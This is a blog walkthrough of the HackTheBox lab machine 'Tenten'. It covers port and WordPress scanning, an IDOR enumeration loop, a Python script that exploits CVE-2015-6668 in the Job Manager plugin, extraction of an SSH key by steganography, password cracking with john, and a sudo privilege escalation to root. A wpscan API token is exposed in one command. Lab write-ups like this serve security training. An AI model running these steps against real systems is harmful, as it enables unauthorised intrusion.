Tenten of HTB Penetration

Tenten is a medium-difficulty target machine. The knowledge points involve WordPress plug-in utilization, SSH key blasting, SSH private key login, sudo privilege escalation, etc. Interested students can learn in HackTheBox.

Customs clearance mind map

0x01 detection

port detection

First do a port scan with nmap

nmap -Pn -p- -sV -sC -A -oA nmap_Tenten

The scan results show that the target only opens ports 22 and 80

port 80

Access is redirected to tenten.htb, so domain name resolution needs to be configured in the hosts file

vim /etc/hosts
#configuration tenten.htb

Visit the page again as follows, the template used by the site is WordPress, and its title is Job Portral

There is only the default template Hello world in the website

Click Job Listing to enter the job introduction, the position currently being recruited is penetration testing

Click Apply Now to fill in your resume, which includes name, email, address and other information


Although there is a file upload point, an error will occur when submitting a resume after uploading a PHP script file

Try to change the 8 in the URL for submitting your resume to 1, and change the title from the original Pen Tester to Hello World


Cooperate with grep and cut commands to filter titles

curl -s http://tenten.htb/index.php/jobs/apply/8/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1

Write a script to iterate over the numbers in the URL

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1;done

Successfully obtained the following titles:

1: Job Application: Hello world!
2: Job Application: Sample Page
3: Job Application: Auto Draft
5: Job Application: Jobs Listing
6: Job Application: Job Application
7: Job Application: Register
8: Job Application: Pen Tester
10: Job Application: Application
11: Job Application: cube
12: Job Application: Application
13: Job Application: HackerAccessGranted
14: Job Application: Application

directory scan

WordPress is an open source content management system (CMS) that can be used to build websites, blogs, and applications. It provides a user-friendly interface for users to create and manage content, and has a wealth of plugins and themes to extend its functionality.

Use gobuster to scan the directory of the site, and the results only include the common directories and files of WordPress

gobuster dir -u http://tenten.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 --no-error

vulnerability scan

Use wpscan to conduct a special scan of WordPress templates, and the results show that the WordPress theme is twentyseventeen

wpscan --url http://tenten.htb  --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A -e

It is found that there is a plug-in Job Manager, and there are two vulnerabilities in it, namely IDOR and XSS

Also found a username takis

0x02 online [takis]

Job Manager plugin

As one of the most popular website building platforms in the world, WordPress generally has vulnerabilities in plugins, and only the Job Manager plugin exists in the site. wpscan found that there are two vulnerabilities in Job Manager. XSS has no value in the current environment, so we can focus on CVE-2015-6668. The modified code is as follows:

Script address: https://github.com/k4u5h41/CVE-2015-6668

import requests

print """
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
website = raw_input('Enter a vulnerable website: ')
#filename = raw_input('Enter a file name: ')

filenames = ["Hello world!","Sample Page","Auto Draft","Jobs Listing","Job Application","Register","Pen Tester","Application","cube","HackerAccessGranted"]

for filename in filenames:
    filename2 = filename.replace(" ", "-")
    for year in range(2013,2018):
        for i in range(1,13):
            for extension in {'jpg','jpeg','docx'}:
                URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
                req = requests.get(URL)
                if req.status_code==200:
                    print "[+] URL of CV found! " + URL

Successfully obtained the address and accessed it, the picture may have used steganography


SSH key blasting

Use steghide to analyze the picture and successfully get id_rsa

steghide extract -sf HackerAccessGranted.jpg

Generally speaking, id_rsa is used as a private key in SSH

cat id_rsa

Convert id_rsa to hash by ssh2john to use john blasting

python /usr/share/john/ssh2john.py id_rsa                                                                          

Use john to blast and successfully get the password as superpassword

john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt

SSH private key login

Try to use the private key to log in to SSH, first give it 400 permissions

chmod 400 id_rsa

Log in to user takis with the private key and of course the password

ssh -i id_rsa takis@

Successfully found the first flag in the current user's home directory

cat user.txt

0x03 privilege escalation [root]

collect message

Check the sudo permissions of the current user, the results show that the sudo command can be used to execute any super user permissions, but the premise is that you need to have the password of the current user, only when you run /bin/fuckin with sudo without entering the password

sudo -l

Look at /bin/fuckin, its content is a Bash script, there are four input parameters

cat /bin/fuckin

try to run the program fuckin

/bin/fuckin echo mac

sudo privilege escalation

Since sudo does not require a password to run fuckin, enter the command id to view the current permission as root

sudo /bin/fuckin id

Successfully obtained root's shell

sudo /bin/fuckin /bin/bash

Successfully obtained the second flag in the /root directory

cat /root/root.txt

0x04 summary

Tenten is translated as two tens, which may be taken from twenty in the WordPress theme twentyseventeen. Through information collection, it is found that the CMS used by the target site is WordPress. A simple browsing of the website shows that the main function of the site is work photos. Try to use wpscan to scan and find the username takis and the WordPress plugin Job Manager. There are two vulnerabilities in the plugin, namely XSS and IDOR. I searched for resumes based on the IDOR vulnerability enumeration, and finally successfully found a picture using steganography.

The SSH private key id_rsa was found after analysis using steghide. Since the private key cannot be used directly and a password is required, the private key is converted into a blastable hash value through ssh2john, and finally the plaintext password is successfully blasted using john. Use this password to complete the SSH private key login and successfully obtain user permissions. Check the sudo authority of the current user in the server, and find that /bin/fuckin can be executed through sudo without a password, so the sudo command can be successfully elevated to root authority with /bin/fuckin.

Tags: bash ssh wordpress

Posted by nolos on Fri, 23 Dec 2022 13:42:08 +0530